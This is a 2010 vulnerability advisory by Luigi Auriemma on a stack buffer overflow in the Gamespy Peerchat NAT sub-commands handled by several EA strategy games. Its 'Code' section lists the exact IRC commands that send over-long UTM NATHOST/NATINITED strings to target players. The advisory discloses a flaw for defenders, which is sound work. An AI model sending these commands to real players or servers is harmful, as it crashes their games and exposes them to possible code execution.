####################################################################### Luigi Auriemma Application: Electronic Arts games that use the Gamespy network http://www.ea.com http://www.gamespy.com Games: Command & Conquer 3: Kane's Wrath <= 1.02 Command & Conquer 3: Tiberium Wars <= 1.09 Command & Conquer: Red Alert 3 <= 1.12 Command & Conquer: Red Alert 3 – Uprising <= 1.00 The Lord of the Rings: Battle for Middle-Earth <= 1.03 The Lord of the Rings: Battle for Middle-Earth 2 <= 1.06 The Lord of the Rings: BFME2: ROTWK <= 2.01 ... possibly others ... Platforms: Windows (tested), other platforms supported Bug: buffer-overflow Exploitation: remote, versus server and players Date: 01 Jul 2010 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Electronic Arts (EA) is a big games developer and publisher and both Command and Conquer (3 and RA3) and, in less misure, the BFME series are great examples. ####################################################################### ====== 2) Bug ====== The Gamespy network uses a particular method to handle lobbies (chat rooms) and servers. First of all there is no real difference between them in the first moment because a server is launched just as a normal IRC chat room and so any operation like joining of new players, setting them ready, choosing of colors or teams and so on is all done over the Peerchat IRC server. This particular "platform" includes also the handling of the players behind NAT to allow the usage of peer-to-peer games like those subject of this advisory. In these EA games are used some particular sub-commands of the UTM IRC command that are explained here: http://old.zenhax.com/red-alert-3-and-gamespy-peerchat-research-t501.html NATHOST and NATINITED are two of these sub-commands and are also the only to support a string as argument (the name of the user who sent them) that is handled by the target player using sscanf and the following format argument: "%d %d %s" Just the string in the last argument is the cause of a stack based buffer-overflow if it's longer than the about 200 bytes assigned to the destination buffer. The only thing that the attacker must do to exploit this vulnerability versus the other players is joining the room of the server (it's publicly visible being a room in an IRC server) on the Peerchat server and sending the UTM command from there to the target users in it. From my tests only the C&C3, RA3, BFME and BFME2 games support these particular sub-commands so I guess don't exist other vulnerable games. ####################################################################### =========== 3) The Code =========== Join the Gamespy Peerchat server (peerchat_irc tool), join the channel of the server created by the victim user (whois) and then send one of the following IRC commands: /UTM USER :NAT NATHOST1 9999 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aaa /UTM USER :NAT NATINITED1 9999 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aaa where USER is the nickname of the target user (admin of the server/room or other players) and the last argument is a sequence of chars longer than 200 chars. additional example: /WHOIS target_user (or retrieve all the channels with LIST) /JOIN #GSP!redalert3pc!M01234567M (chan/server of the user) /UTM target_user :NAT NATHOST1 1234 aaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aaa ####################################################################### ====== 4) Fix ====== No fix. #######################################################################